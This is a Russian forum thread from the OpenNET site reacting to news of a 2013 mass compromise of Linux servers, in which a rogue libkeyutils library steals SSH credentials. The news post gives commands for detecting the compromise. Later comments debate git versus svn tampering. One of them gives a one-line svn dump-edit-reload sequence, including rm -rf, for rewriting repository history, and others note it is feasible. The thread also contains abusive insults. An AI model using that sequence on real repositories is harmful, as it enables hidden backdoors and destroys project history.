The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"В Сети зафиксирован массовый взлом серверов на базе Linux"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от opennews on 19-Фев-13, 14:03 
Третий день в Сети наблюдается (http://blog.solidshellsecurity.com/2013/02/18/0day-linuxcent.../) массовый взлом серверов на базе Linux. Имеется подозрение, что атака совершается через неисправленную 0-day уязвимость в одном из сетевых сервисов. Среди взломанных систем отмечаются серверы на базе CentOS и других дистрибутивов на основе пакетной базы RHEL, на которых установлены все доступные обновления. На многих взломанных системах используются панели управления cPanel, DirectAdmin и Plesk, пока не ясно могут ли они быть источником проникновения.


В результате атаки в системе неизвестным образом появляется файл /lib64/libkeyutils.so.1.9 (для 32-разрядных систем /lib/libkeyutils.so.1.9). После взлома процесс sshd начинает устанавливать подозрительные соединения: при входе на взломанный сервер по ssh, по протоколу UDP осуществляется отправка данных о введённых логине и пароле на 53 порт внешнего хоста. Кроме того, на сервер размещается код для участие в ботнете, используемом для рассылки спама и возможно для совершения дальнейших атак.


Маловероятно, что вектор атака связан с недавно обсуждаемой уязвимостю (http://www.opennet.dev/opennews/art.shtml?num=36132) в ядре Linux (CVE-2013-0871), кроме всего прочего выявлены случаи взлома изолированного окружения, построенного на базе дистрибутива CloudLinux с включенным CageFS (http://docs.cloudlinux.com/index.html?cagefs.html). Среди атакованных система также отмечаются серверы с системой обновления ядра ksplice и серверы с sshd на нестандартном порту.


Для выявления факта взлома своей системы достаточно проверить наличие библиотеки /lib64/libkeyutils.so.1.9, не связанной ни с одним установленным пакетом (для 64-разрядных систем: ls -la /lib64/libkeyutils.so.1.9; rpm -qf /lib64/libkeyutils.so.1.9, для 32-разрядных: ls -la /lib/libkeyutils.so.1.9;rpm -qf /lib/libkeyutils.so.1.9).


URL: http://community.solidshellsecurity.com/topic/27344-0day-lin.../
Новость: http://www.opennet.dev/opennews/art.shtml?num=36155

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


2. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от б.б. on 19-Фев-13, 14:03 
> На многих системах используются панели управления cPanel, DirectAdmin и Plesk.

Закладка?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору
Часть нити удалена модератором

39. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –5 +/
Сообщение от linux must _RIP_ on 19-Фев-13, 14:59 
сломано сильно больше 3х колек. к сожалению. Счет пошел на десятки, если не сотни.
Если вы поинтересуетесь (чуть чуть погуглите) то таки найдете больше информации.

с немного другой стороны - сказали что недавно проломили php - и через него залили архивчик с несколькими эксплойтами под ядро + на всякий случай - под гипервизоры, но так как там был не linux, то народ обломался.

скорее всего там уязвимость не sshd. так как Plesk, cPannel - предоставляют доступ шел юзерам только через песочницу (jail shell) там там /lib он не настоящий и r/o к тому же.
учитывая что там был cageFS - это значит надо выпрыгнуть из VFS namespace, что само по себе значительно сложнее банального выпрыгивания из chroot.

так что вот так...

Ответить | Правка | Наверх | Cообщить модератору

65. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –3 +/
Сообщение от Аноним (??) on 19-Фев-13, 15:14 
> но так как там был не linux, то народ обломался.

А у фрибздоидов вон недавно не обломались - сервера они укладывали до разбирательства. Так что тоже не панацея как видим.

Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

98. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от IMHO on 19-Фев-13, 15:42 
за то сервер не порутали, как у kernel org
)))
а да, никаких взломов нету, новость не про что, как всегда, линукс это только ядро, все уже это знают
Ответить | Правка | ^ к родителю #65 | Наверх | Cообщить модератору

100. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +3 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 15:45 
> а да, никаких взломов нету,

Никаких массовых покупок антивирусов нету. Никаких массовых (ежедневных) переустановок нету. Никаких лишних тревог нету. Живём не на пороховой бочке, как некоторые.

Ответить | Правка | ^ к родителю #98 | Наверх | Cообщить модератору

137. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –5 +/
Сообщение от Аноним (??) on 19-Фев-13, 16:21 
> за то

А точно не в то? И не под то?

> сервер не порутали, как у kernel org

Не больно какая разница, один хрен хост под реинсталл, т.к. мало ли кто, чего и где не заметил. Зато у пингвиноидов самое ценное что там было, т.е. сорец линя защищен DVCSом от левых вбросов коммитов задним числом в силу принципов его работы. У бсдоидов ничего подобного ясен фиг нет. И гарантировать целостность сорса и отсутствия там левых коммитов явно сложнее.

> а да, никаких взломов нету, новость не про что, как всегда, линукс
> это только ядро, все уже это знают

Да, линукс - это ядро. Ну так новость и написана "на базе Linux". Нигде не говорится что виновато именно ядро вроде. Мало ли - может троян ключи у виндоюзеров ворует. Или вообще в sshd дырка. Или там еще чего. Ядро туда каким боком?

Ответить | Правка | ^ к родителю #98 | Наверх | Cообщить модератору

162. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –3 +/
Сообщение от тигар (ok) on 19-Фев-13, 16:41 
>Зато у пингвиноидов самое ценное
> что там было, т.е. сорец линя защищен DVCSом от левых вбросов
> коммитов задним числом в силу принципов его работы. У бсдоидов ничего
> подобного ясен фиг нет. И гарантировать целостность сорса и отсутствия там
> левых коммитов явно сложнее.

задам традиционный вопрос: сможешь это сделать с svn и рассказать как это делается ?;)

Ответить | Правка | ^ к родителю #137 | Наверх | Cообщить модератору

300. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 19:14 
> задам традиционный вопрос: сможешь это сделать с svn и рассказать как это делается ?;)

Давай лучше методом от противного: что на фундаментальном уровне помешает атакующему сделать это действие? В случае git все упрется в полный отъезд дерева хэшей, который будет дичайше палить подобную активность и вызовет неизбежное изучение столь странной ситуации. А в svn?

А то так можно дойти до состояния "ой, да ну, зачем проверять подписи пакетов? А как атакующий файлы поменяет?!". Хотя вроде у вас оно как-то так и происходит, не? :)

Ответить | Правка | ^ к родителю #162 | Наверх | Cообщить модератору

362. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –3 +/
Сообщение от тигар (ok) on 19-Фев-13, 21:16 
>> задам традиционный вопрос: сможешь это сделать с svn и рассказать как это делается ?;)
> Давай лучше методом от противного: что на фундаментальном уровне помешает атакующему сделать
> это действие? В случае git все упрется в полный отъезд дерева
> хэшей, который будет дичайше палить подобную активность и вызовет неизбежное изучение
> столь странной ситуации. А в svn?
> А то так можно дойти до состояния "ой, да ну, зачем проверять
> подписи пакетов? А как атакующий файлы поменяет?!". Хотя вроде у вас
> оно как-то так и происходит, не? :)

давай без давай? по шагам, что нужно сделать в случае с svn для "левых вбросов коммитов задним числом". упрощу задачу: предположим, что даже root на машинку с репо есть у тебя. итак, жду пошаговую инструкцию по внедрению.
пока только молитвы торвалцу вижу я со стороны поклонников git по поводу этого дела и ничего больше.

Ответить | Правка | ^ к родителю #300 | Наверх | Cообщить модератору

398. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Аноним (??) on 19-Фев-13, 22:13 
> пока только молитвы торвалцу вижу я со стороны поклонников git по поводу
> этого дела и ничего больше.

В общем то "молитва" достаточно простая: я вижу что НЕ даст это сделать на уровне алгоритмики процесса. Это просто, понятно, логично и вполне убедительно. Поскольку файлы имеют такое свойство что их можно перезаписывать, а оптимизм в секурити недопустим, я не вижу никаких оснований полагать что по умолчанию хакер чего-либо не сможет. Чтобы он чего-то не смог - что-то должно ему явным образом помешать это сделать. В случае с гитом мне понятно что испортит ему планы. В случае с SVN - нет.

P.S. и кстати, а если я скажу что "возможно слелать на луну" - от меня будет затребован мануал по строительству лунной ракеты для доказательства этого тезиса?

Ответить | Правка | ^ к родителю #362 | Наверх | Cообщить модератору

400. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от тигар (ok) on 19-Фев-13, 22:21 
>> пока только молитвы торвалцу вижу я со стороны поклонников git по поводу
>> этого дела и ничего больше.
> В общем то "молитва" достаточно простая: я вижу что НЕ даст это
> сделать на уровне алгоритмики процесса. Это просто, понятно, логично и вполне
> убедительно. Поскольку файлы имеют такое свойство что их можно перезаписывать, а
> оптимизм в секурити недопустим, я не вижу никаких оснований полагать что
> по умолчанию хакер чего-либо не сможет. Чтобы он чего-то не смог

так елки-палки. все же просто.
svnadmin create /tmp/c00lrepo
в репо пихаешь файликов несколькими коммитами, пытаешься заменить файл. этого я от тебя жду;-) без "я вижу" и "я не вижу". нужны факты. команда1...командаN. рез-т = левый файл в репо, так чтобы это стало незаметно для меня, делающего update оттуда.

> - что-то должно ему явным образом помешать это сделать. В случае
> с гитом мне понятно что испортит ему планы. В случае с
> SVN - нет.
> P.S. и кстати, а если я скажу что "возможно слелать на луну"
> - от меня будет затребован мануал по строительству лунной ракеты для
> доказательства этого тезиса?

ну был такой персонаж.. с мельницами ветряными боролся. почему-то кажется, что ваше божество с ним тут схожи. опровергнешь, на примере svn?;-)

Ответить | Правка | ^ к родителю #398 | Наверх | Cообщить модератору

434. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Аноним (??) on 20-Фев-13, 02:51 
svnadmin dump repo > dump; hack dump; rm -rf repo; svnadmin create repo; svnadmin load repo < dump;
Ответить | Правка | ^ к родителю #400 | Наверх | Cообщить модератору

466. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –4 +/
Сообщение от тигар (ok) on 20-Фев-13, 10:31 
> svnadmin dump repo > dump; hack dump; rm -rf repo; svnadmin create
> repo; svnadmin load repo < dump;

ты себе примерно хотябы представляешь сколько времени оно будет работать? даже тупой убунтовод заметил бы, что на хосте активность левая.
это "раз"
два: готов выслушать подробнее про "hack dump"
чтобы более предметно, на примере "Revision-number: 2" из дампа (заодно расскажи сколько часов и места понадобилось, для dump.)
для ports, например, до 60000 ревизии за 5 минут только дошло из 312610. при этом размер дампа 1гб получился. итого, грубо говоря, у тебя есть 5 гиг дампа. чего дальше?;-)

Ответить | Правка | ^ к родителю #434 | Наверх | Cообщить модератору

628. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 21-Фев-13, 12:26 
> ты себе примерно хотябы представляешь сколько времени оно будет работать?

Начались жиденькие отмазки...

Ответить | Правка | ^ к родителю #466 | Наверх | Cообщить модератору

629. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от тигар (ok) on 21-Фев-13, 12:33 
>> ты себе примерно хотябы представляешь сколько времени оно будет работать?
> Начались жиденькие отмазки...

ну почемуже, чуть ниже я написал, сколько оно у меня на примере ports работало, на тачке без raid. пускай это будет "1 час"
внедри же пакость! #471

Ответить | Правка | ^ к родителю #628 | Наверх | Cообщить модератору

667. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 21-Фев-13, 17:58 
> тебя есть 5 гиг дампа. чего дальше?;-)

А чем 5 гиг дампа так страшны? У меня есть файлики и на 200 гигз. И?

Ответить | Правка | ^ к родителю #466 | Наверх | Cообщить модератору

471. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от тигар (ok) on 20-Фев-13, 11:24 
> svnadmin dump repo > dump; hack dump; rm -rf repo; svnadmin create
> repo; svnadmin load repo < dump;

в #466 я ошибся.. "слегка"

[tiger@svn]~%\time svnadmin dump /usr/local/repositories/freebsd/ports/ > ~/ports-dump
[skipped]
* Dumped revision 312610.
     3441.51 real      2245.55 user       503.73 sys
[tiger@svn]~%ll -h ports-dump
-rw-r--r--  1 tiger  wheel    19G Feb 20 10:21 ports-dump
итак, нужно в Revision-number: 4 в тот пердокод который там встроить пакость. твои действия: .. ?

Ответить | Правка | ^ к родителю #434 | Наверх | Cообщить модератору

561. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 20-Фев-13, 20:42 
> тебя жду;-) без "я вижу" и "я не вижу". нужны факты.

Ну вот я потому и спрашиваю: должен ли я предоставить полный мануал по сборке лунной ракеты если я полагаю что можно слетать на Луну?

Ответить | Правка | ^ к родителю #400 | Наверх | Cообщить модератору

732. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от playnet (ok) on 05-Мрт-13, 00:40 
> так елки-палки. все же просто.
> svnadmin create /tmp/c00lrepo
> в репо пихаешь файликов несколькими коммитами, пытаешься заменить файл. этого я от
> тебя жду;-) без "я вижу" и "я не вижу". нужны факты.
> команда1...командаN. рез-т = левый файл в репо, так чтобы это стало
> незаметно для меня, делающего update оттуда.

Я такое штатно делал, когда добавлял в 1 ревизию (их уже 3000 было) каталог транк и перетягивал туда всё. Дамп, vi, замена регэкспом, сохранить, влить. Правда в 1.6, а в 1.7 появились md5, и их было влом пересчитывать для всех файлов. Но за пару дней я мог бы написать скрипт, который вносит правки, пересчитывает длины строк итд.

Ответить | Правка | ^ к родителю #400 | Наверх | Cообщить модератору

225. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Аноним (??) on 19-Фев-13, 17:47 
> Не больно какая разница, один хрен хост под реинсталл, т.к. мало ли
> кто, чего и где не заметил. Зато у пингвиноидов самое ценное
> что там было, т.е. сорец линя защищен DVCSом от левых вбросов
> коммитов задним числом в силу принципов его работы.

Увели пароль админа серера с правом коммита в DVCS? Что помешает злоумышленнику закомитеть совершенно стандартным образом патчик? Разраб от которого закоммители тут же это увидит? - да не смешите мои тапочки. Другие увидят? - еще смешнее.

Ответить | Правка | ^ к родителю #137 | Наверх | Cообщить модератору

229. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 17:52 
> Увели пароль админа серера с правом коммита в DVCS? Что помешает злоумышленнику
> закомитеть совершенно стандартным образом патчик? Разраб от которого закоммители тут же
> это увидит? - да не смешите мои тапочки. Другие увидят? -
> еще смешнее.

Ну, конечно, висит левый патч, и все делают вид, что так и задумано.

Я в программах, на которые подписан на github/bitbucket, иногда подолгу патчи созерцаю. Хотя я вообще мало что понимаю, что в этих цветных логах диффов написано.

А тот, кто это себе применять будет, особенно если это кто-то из разработчиков, обязательно diff посмотрит, чтобы увидеть, что вообще пришло. А то это бред получится - в проект постоянно что-то добавляется, а разработчику вообще побоку, что это - он своё пишет и на других внимание не обращает, правки не смотрит, pull request-ы принимает с закрытыми глазами.


Ах да, я и забыл, вы же из реальности виндузятников. Там такое поведение - норма?

Ответить | Правка | ^ к родителю #225 | Наверх | Cообщить модератору

338. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 20:08 
>> Увели пароль админа серера с правом коммита в DVCS? Что помешает злоумышленнику
>> закомитеть совершенно стандартным образом патчик? Разраб от которого закоммители тут же
>> это увидит? - да не смешите мои тапочки. Другие увидят? -
>> еще смешнее.
> Ну, конечно, висит левый патч, и все делают вид, что так и
> задумано.

Когда эти патчей в день коммитится достаточно много и тем более не от новичка - пропустить можно, да и не будут пихать патч прямо с явным кодом бекдора.

> Я в программах, на которые подписан на github/bitbucket, иногда подолгу патчи созерцаю.
> Хотя я вообще мало что понимаю, что в этих цветных логах
> диффов написано.

медитируешь? думаешь есть от этого толк?

> А тот, кто это себе применять будет, особенно если это кто-то из
> разработчиков, обязательно diff посмотрит, чтобы увидеть, что вообще пришло. А то
> это бред получится - в проект постоянно что-то добавляется, а разработчику
> вообще побоку, что это - он своё пишет и на других
> внимание не обращает, правки не смотрит, pull request-ы принимает с закрытыми
> глазами.

в крупных проектах разные коммитеры отвечают за разные подсистемы, не факт, что один наблюдает за другим, в этом нет необходимости, плюс в коде ты не найдешь:
back(int door)
{
           char *secret;
...

> Ах да, я и забыл, вы же из реальности виндузятников. Там такое
> поведение - норма?

начинающий убунтовод привед!
ты получил уже получил сидюк с новой убунтой, мне марк, почему-то не хочет слать, говорит денег у него нету... михалков все забрал видимо...

Ответить | Правка | ^ к родителю #229 | Наверх | Cообщить модератору

437. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 03:09 
> Когда эти патчей в день коммитится достаточно много и тем более не
> от новичка - пропустить можно, да и не будут пихать патч
> прямо с явным кодом бекдора.

Виндузятник - это всегда любо дорого посмотреть. Вот такущие щели в безопасности, регулярные миллионы новых пользователей ботнетов, иногда по восьмому кругу, принципиальная невозможность всё это исправить, отсутствие исходных кодов...

А они всё рассуждают о ситуациях "а вдруг всех разработчиков настигнет массовый маразм, и что будет тогда". Ничего не будет. Кроме того, для того и есть стабильные дистрибутивы, где исходники одни и те же всю жизнь дистрибутива, и где ничего не добавляют, зато старое ежедневно на практике тестируют.

Сколько и каких патчей коммитится в проприетарные проекты - даже близко нельзя посчитать. ВОТ что вас волновать должно. Если это для вас проблема - вы уже давно с плакатами должны стоять "верните нам наши исходники, созданные на наши деньги", а не рассуждать о теоретических опасностях. Или вас это волнует только в свободных проектах, а в проектах, которые используете вы, не волнует вообще никак? Тогда это безнадёжный случай.

Ответить | Правка | ^ к родителю #338 | Наверх | Cообщить модератору

451. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Аноним (??) on 20-Фев-13, 06:23 
>> Когда эти патчей в день коммитится достаточно много и тем более не
>> от новичка - пропустить можно, да и не будут пихать патч
>> прямо с явным кодом бекдора.
> Виндузятник - это всегда любо дорого посмотреть. Вот такущие щели в безопасности,
> регулярные миллионы новых пользователей ботнетов, иногда по восьмому кругу, принципиальная
> невозможность всё это исправить, отсутствие исходных кодов...

Ты форумом не ошибся? Если нет, то точно ошибся кнопкой "Ответить".
По делу есть, что сказать?

Ответить | Правка | ^ к родителю #437 | Наверх | Cообщить модератору

453. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 07:02 
> Ты форумом не ошибся? Если нет, то точно ошибся кнопкой "Ответить".
> По делу есть, что сказать?

Сказать то, что вам нравится, у меня нету. Если кому-то когда-то вбили мировоззрение потребительского быдла, если в его мире "сводобное" хуже "несвободного", если в его мире играть в 3д-блокбастеры до красных глаз - это хорошо, а то, что кто-то делает для других людей и просто так - тянет на, как минимум, полновесное оскорбление...

... и самое главное, те, кто не понимая сути свободного, всё равно возвращается и возвращается на опеннет, только с одной целью, похамить и самоутвердиться...

... тот ничего не поймёт. Нельзя из урода, думающего только о себе, и свои проблемы возвеличивающие до вселенских масштабов, заставляя всех с ними соглашаться, сделать человека. А если и можно, то мне и науке такие способы неизвестны.

Поэтому с моей стороны несколько странно было бы ждать, что существо, которое умеет только хамить и выражать вечное недовольство, внезапно прекратит хамить и выражать вечное недовольство. Или начнёт понимать, в чём смысл свободного движения. Или хотя бы перестанет переходить на опеннет (то есть, перестанет вести себя, как престарелая девственница, которому на словах всё это жутко не нравится, но он ПРОДОЛЖАЕТ И ПРОДОЛЖАЕТ сюда приходить).


Тут всё просто - если человек на тематическом форуме не разделяет тематики этого форума, то он дурак. И пришёл на форум только для того, чтобы мешать другим. И поэтому против такого все средства хороши, и каждый, кто плюнет ему в рожу, будет только прав - ведь именно этого вы и хотели, правда? Раз вы так себя ведёте, значит именно такого отношения вы и хотите? И вы его и получите, вас всегда тут будут дрочить. Потому что иного способа излечить вас от неполноценности - нет.

Жаль, что вы не слова не поймёте из того, что я написал. Иначе вы бы осознали, как нелепо вы выглядите, приходя на опеннет со своим усталым.

Ответить | Правка | ^ к родителю #451 | Наверх | Cообщить модератору

474. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от Аноним (??) on 20-Фев-13, 11:57 
> Иначе вы бы осознали, как нелепо вы выглядите, приходя на опеннет
> со своим усталым.

ну для начала у меня он не усталый :), хотя натруженный, да.

> Сказать то, что вам нравится, у меня нету.

Где я просил что бы ты мне сказал, что мне нравится?

читаю это:
> возвращается и возвращается на опеннет, только с одной целью, похамить и
> самоутвердиться...

затем это:
>Нельзя из урода, думающего только о себе
>он дурак
> излечить вас от неполноценности - нет.

ты конечно же о себе говорил, правильно? самокритика это хорошо, да, но иди плакаться в службу психологической помощи.

предметно что-нибудь есть? нет? гуляй.

Ответить | Правка | ^ к родителю #453 | Наверх | Cообщить модератору

475. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +3 +/
Сообщение от бедный буратино (ok) on 20-Фев-13, 12:03 
> предметно что-нибудь есть? нет? гуляй.

Как вам можно объяснить, что никаких левых коммитов ниоткуда появиться не может, вероятность совсем мизерная, и это подтвержает практика - если вы считаете всех разработчиков тупыми и некомпетентными, для которых git/hg/bzr/fossil это неведома штука, откуда постоянно какие-то лишние файлы вываливаются, глаза бы их не видели? Что могут сделать факты против такого слепого поклонения собственной фантазии?

Можно только посчитать вас законченным дурачком-мудачком, что я и делаю, хоть и без удовольствия.

Ответить | Правка | ^ к родителю #474 | Наверх | Cообщить модератору

558. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от Аноним (??) on 20-Фев-13, 20:31 
>> предметно что-нибудь есть? нет? гуляй.
> Как вам можно объяснить, что никаких левых коммитов ниоткуда появиться не может,
> вероятность совсем мизерная, и это подтвержает практика - если вы считаете
> всех разработчиков тупыми и некомпетентными, для которых git/hg/bzr/fossil это неведома
> штука, откуда постоянно какие-то лишние файлы вываливаются, глаза бы их не
> видели? Что могут сделать факты против такого слепого поклонения собственной фантазии?

Вероятность увода приват кея от ссх тоже мизерная, но тем ни менее, вам показать крупные проекты, которые были взломаны подобным образом или сами вспомните?

Ответить | Правка | ^ к родителю #475 | Наверх | Cообщить модератору

563. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –3 +/
Сообщение от linux must _RIP_ on 20-Фев-13, 20:52 
>>> предметно что-нибудь есть? нет? гуляй.
>> Как вам можно объяснить, что никаких левых коммитов ниоткуда появиться не может,
>> вероятность совсем мизерная, и это подтвержает практика - если вы считаете
>> всех разработчиков тупыми и некомпетентными, для которых git/hg/bzr/fossil это неведома
>> штука, откуда постоянно какие-то лишние файлы вываливаются, глаза бы их не
>> видели? Что могут сделать факты против такого слепого поклонения собственной фантазии?
> Вероятность увода приват кея от ссх тоже мизерная, но тем ни менее,
> вам показать крупные проекты, которые были взломаны подобным образом или сами
> вспомните?

лучше показать - и напомнить как взломали Fedora. видимо этого взлома не существовало в природе?
kernel.org не ломали - так что он месяцы валялся в downtime..
А "исправления" которые сделали в Debian - так аукнулись всему интернету - подарив самый большой удар по криптографии openssl - что можно просто не шифовать данные.

Ответить | Правка | ^ к родителю #558 | Наверх | Cообщить модератору

701. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от цирроз (ok) on 22-Фев-13, 11:04 
так у них это единственный шанс по жизни - попытаться выглядеть крутым спецом. ничего другого они делать просто не умеют, кроме надувания сопливых пузырей. ни любимой работы, ни любимых хобби.
терзаемые комплексами они лезут в интернет не за ответами, нет! они просто пытаются вырасти в глазах других. беда в том, что у некоторых других есть глаза, мозги, знания и навыки. зачастую - навыки работы минимум на нескольких ОС: винды, макось, линукс. в отличие от задирающих нос сопленадувателей.
Ответить | Правка | ^ к родителю #563 | Наверх | Cообщить модератору

702. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от цирроз (ok) on 22-Фев-13, 11:08 
а сколько нервов и времени сэкономил при безвирусье. плюс денег на апдейты антивирусников - ежегодно заплати. не сильно много, конечно. полста зелени в год. но так оно набегает, по мелочи.

линуксу нужна настройка. а виндам нужен уход. причем, чем раньше и дальше винда уйдёт, тем лучше.

Ответить | Правка | ^ к родителю #475 | Наверх | Cообщить модератору

248. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +5 +/
Сообщение от arisu (ok) on 19-Фев-13, 18:04 
мудак cannot into dvcs.
Ответить | Правка | ^ к родителю #225 | Наверх | Cообщить модератору

303. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 19:16 
> мyдак cannot into dvcs.

Кэп суров но справедлив. Как обычно. Я поражаюсь насколько у некоторых имбецилов мышление централизованными VCS испохаблено. Они не могут понять что хост кернелорга в этой схеме - ни разу не святой грааль, в отличие от централизованных VCS :)

Ответить | Правка | ^ к родителю #248 | Наверх | Cообщить модератору

331. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 19:56 
>> мyдак cannot into dvcs.
> Кэп суров но справедлив. Как обычно. Я поражаюсь насколько у некоторых имбецилов
> мышление централизованными VCS испохаблено. Они не могут понять что хост кернелорга
> в этой схеме - ни разу не святой грааль, в отличие
> от централизованных VCS :)

и они ни как не синхронятся, а если и синхронятся, то все всё читают и проверяют?

Ответить | Правка | ^ к родителю #303 | Наверх | Cообщить модератору

366. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 21:19 
> и они ни как не синхронятся, а если и синхронятся,

Они конечно синхронятся. Вопрос лишь в том как. Вот эта "незначительная" деталь все как раз и портит.

Ответить | Правка | ^ к родителю #331 | Наверх | Cообщить модератору

450. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 20-Фев-13, 06:20 
>> и они ни как не синхронятся, а если и синхронятся,
> Они конечно синхронятся. Вопрос лишь в том как. Вот эта "незначительная" деталь
> все как раз и портит.

чего она портит? все всё при синхроне начинают читать и проверять?

Ответить | Правка | ^ к родителю #366 | Наверх | Cообщить модератору

564. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 20-Фев-13, 20:59 
> чего она портит? все всё при синхроне начинают читать и проверять?

В данной схеме вообще нет никакого синхрона с каким-либо "центром вселенной". Есть синхрон распределенной команды разработчиков между собой по неким правилам. А кернелорг - лишь некая копия репов для удобства. Вы собственно можете получить копию репов с правом коммита сделав элементарный git clone. Вот правда никто не обещает что ваши коммиты кто-то куда-то потом возьмет. Это в централизованых VCS все слепо верят одному центральному серваку. А в dvcs такого вообще нет.

Ответить | Правка | ^ к родителю #450 | Наверх | Cообщить модератору

611. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 21-Фев-13, 04:04 
>> чего она портит? все всё при синхроне начинают читать и проверять?
> В данной схеме вообще нет никакого синхрона с каким-либо "центром вселенной". Есть
> синхрон распределенной команды разработчиков между собой по неким правилам. А кернелорг
> - лишь некая копия репов для удобства. Вы собственно можете получить
> копию репов с правом коммита сделав элементарный git clone. Вот правда
> никто не обещает что ваши коммиты кто-то куда-то потом возьмет. Это
> в централизованых VCS все слепо верят одному центральному серваку. А в
> dvcs такого вообще нет.

Это понятно, вопрос в том, что портит эта "незначительная" деталь?

Ответить | Правка | ^ к родителю #564 | Наверх | Cообщить модератору

630. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 21-Фев-13, 12:33 
> Это понятно, вопрос в том, что портит эта "незначительная" деталь?

Судя по всему - вам нихрена не понятно. Поясняю: то что на кернелорге лежит копия репов еще не значит что разработчики будут из нее мержить изменения к себе. Что делает коммит в такие репы достаточно инфантильным. "На третий день Зоркий Глаз заметил что у сарая нет стены."

Ответить | Правка | ^ к родителю #611 | Наверх | Cообщить модератору

352. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +3 +/
Сообщение от arisu (ok) on 19-Фев-13, 20:58 
вот, в ответе опять. я некоторое время пояснять пытался, но устал дико. вообще, дураков надо или посылать, или с ними соглашаться. попробую делать именно так.
Ответить | Правка | ^ к родителю #303 | Наверх | Cообщить модератору

287. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 18:59 
> Увели пароль админа серера с правом коммита в DVCS?

При таких познаниях лучше заниматься аналитикой в какой-нибудь иной отрасли, где ваш ламеризм  будет менее очевиден. В этой фразе столько ошибок что я даже не знаю с какого бока начать. Вижу минимум 1 проблему: у вас стиль мышления искореженный централизованными VCS. Понимаете, кернелорг в этой схеме не есть священный грааль. Он всего лишь 1 из репов. Такой же как у каждого разработчика.

Ответить | Правка | ^ к родителю #225 | Наверх | Cообщить модератору

341. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –3 +/
Сообщение от Аноним (??) on 19-Фев-13, 20:12 
>> Увели пароль админа серера с правом коммита в DVCS?
> При таких познаниях лучше заниматься аналитикой в какой-нибудь иной отрасли, где ваш
> ламеризм  будет менее очевиден. В этой фразе столько ошибок что
> я даже не знаю с какого бока начать. Вижу минимум 1
> проблему: у вас стиль мышления искореженный централизованными VCS. Понимаете, кернелорг
> в этой схеме не есть священный грааль. Он всего лишь 1
> из репов. Такой же как у каждого разработчика.

прямо так живенько вырисовывается картинка с хомячками, каждый получил свою семечку, разбежались по углам, повернулись друг к другу задом и точат и точат...

Ответить | Правка | ^ к родителю #287 | Наверх | Cообщить модератору

374. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Аноним (??) on 19-Фев-13, 21:28 
> прямо так живенько вырисовывается картинка с хомячками, каждый получил свою семечку, разбежались
> по углам, повернулись друг к другу задом и точат и точат...

Ну вот хомячиный умишко никак не может понять - что за D такое в слове DVCS. Они почему-то думают что есть центральная кормушка с семечками, являющаяся каким-то непререкаемым авторитетом. Что, мягко говоря, не соответствует действительности.


Ответить | Правка | ^ к родителю #341 | Наверх | Cообщить модератору

